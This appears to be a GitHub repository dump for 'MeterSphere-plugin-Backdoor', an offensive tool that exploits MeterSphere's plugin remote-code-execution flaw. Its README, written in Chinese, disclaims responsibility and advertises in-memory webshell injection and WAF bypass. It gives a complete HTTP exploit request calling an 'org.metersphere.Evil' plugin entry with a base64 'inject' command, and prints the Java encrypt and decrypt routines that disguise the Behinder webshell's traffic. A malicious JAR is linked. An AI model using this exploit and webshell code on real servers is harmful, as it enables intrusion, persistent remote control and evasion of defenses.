├── MeterSphere.jar
├── README.md
└── README
    ├── image-20231211142156295.png
    ├── image-20231211142834521.png
    ├── image-20231211143212494.png
    └── image-20231211143224759.png


/MeterSphere.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/wafinfo/MeterSphere-plugin-Backdoor/8614a8b120c1e205c0432afac2571ac7990b0846/MeterSphere.jar


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
  1 | # MeterSphere-plugin-Backdoor
  2 | ##  👮🏻‍♀️ 免责声明
  3 | 
  4 | 由于传播、利用**MeterSphere-plugin-Backdoor**工具提供的而造成的**任何直接或者间接的后果及损失**，均由使用者本人负责，本人**不为此承担任何责任**。
  5 | 
  6 | * 支持注入内存马和Bypass WAF
  7 | 
  8 | #### 命令执行
  9 | 
 10 | ![image-20231211142156295](README/image-20231211142156295.png)
 11 | 
 12 | #### 注入内存马
 13 | 
 14 | * 传入**inject**编码后的**Base64**进行注入冰蝎内存马
 15 | 
 16 | ```
 17 | POST /plugin/customMethod HTTP/1.1
 18 | Host: localhost:8081
 19 | Accept-Encoding: gzip, deflate
 20 | Accept: */*
 21 | Accept-Language: en-US;q=0.9,en;q=0.8
 22 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.75 Safari/537.36
 23 | Connection: close
 24 | Cookie: MS_SESSION_ID=75407ecc-369b-48a7-ae80-d000f0d1b700
 25 | Cache-Control: max-age=0
 26 | Content-Type: application/json
 27 | Content-Length: 65
 28 | 
 29 | {
 30 |   "entry": "org.metersphere.Evil",
 31 |   "request": "aW5qZWN0"
 32 | }
 33 | ```
 34 | 
 35 | * 冰蝎加密函数
 36 | 
 37 | ```java
 38 | private byte[] Encrypt(byte[] data) {
 39 |     byte[] dt = new byte[data.length];
 40 |     for (int i = 0; i < data.length; i++) {
 41 |         dt[i] = (byte) (data[i] + 1);
 42 |     }
 43 |     try {
 44 |         java.io.ByteArrayOutputStream o = new java.io.ByteArrayOutputStream();
 45 |         java.util.zip.GZIPOutputStream g = new java.util.zip.GZIPOutputStream(o);
 46 |         g.write(dt);
 47 |         g.close();
 48 |         byte[] c = o.toByteArray();
 49 |         byte[] ct = new byte[c.length];
 50 | 
 51 |         for (int i = 0; i < c.length; i++) {
 52 |             ct[i] = (byte) (c[i] + 1);
 53 |         }
 54 |         return ct;
 55 |     } catch (Exception ignored) {
 56 |     }
 57 |     return data;
 58 | }
 59 | ```
 60 | 
 61 | * 冰蝎解密函数
 62 | 
 63 | ```java
 64 | private byte[] Decrypt(byte[] data) {
 65 |     byte[] dt = new byte[data.length];
 66 |     for (int i = 0; i < data.length; i++) {
 67 |         dt[i] = (byte) (data[i] - 1);
 68 |     }
 69 |     try {
 70 |         java.io.ByteArrayInputStream t = new java.io.ByteArrayInputStream(dt);
 71 |         java.util.zip.GZIPInputStream i = new java.util.zip.GZIPInputStream(t, dt.length);
 72 |         byte[] c = r(i);
 73 |         byte[] ct = new byte[c.length];
 74 |         for (int b = 0; b < c.length; b++) {
 75 |             ct[b] = (byte) (c[b] - 1);
 76 |         }
 77 |         return ct;
 78 |     } catch (Exception ignored) {
 79 |     }
 80 |     return data;
 81 | }
 82 | private byte[] r(java.io.InputStream i) {
 83 |     byte[] temp = new byte[1024];
 84 |     java.io.ByteArrayOutputStream b = new java.io.ByteArrayOutputStream();
 85 |     int n;
 86 |     try {
 87 |         while((n = i.read(temp)) != -1) {b.write(temp, 0, n);
 88 |         }} catch (Exception ignored) {
 89 |     }
 90 |     return b.toByteArray();
 91 | }
 92 | ```
 93 | 
 94 | ![image-20231211142834521](README/image-20231211142834521.png)
 95 | 
 96 | ![image-20231211143212494](README/image-20231211143212494.png)
 97 | 
 98 | ![image-20231211143224759](README/image-20231211143224759.png)
 99 | 
100 | ### 参考
101 | 
102 | https://github.com/vulhub/vulhub/tree/master/metersphere/plugin-rce
103 | 
104 | https://github.com/metersphere/metersphere/security/advisories/GHSA-mcwr-j9vm-5g8h
105 | 


--------------------------------------------------------------------------------
/README/image-20231211142156295.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/wafinfo/MeterSphere-plugin-Backdoor/8614a8b120c1e205c0432afac2571ac7990b0846/README/image-20231211142156295.png


--------------------------------------------------------------------------------
/README/image-20231211142834521.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/wafinfo/MeterSphere-plugin-Backdoor/8614a8b120c1e205c0432afac2571ac7990b0846/README/image-20231211142834521.png


--------------------------------------------------------------------------------
/README/image-20231211143212494.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/wafinfo/MeterSphere-plugin-Backdoor/8614a8b120c1e205c0432afac2571ac7990b0846/README/image-20231211143212494.png


--------------------------------------------------------------------------------
/README/image-20231211143224759.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/wafinfo/MeterSphere-plugin-Backdoor/8614a8b120c1e205c0432afac2571ac7990b0846/README/image-20231211143224759.png


--------------------------------------------------------------------------------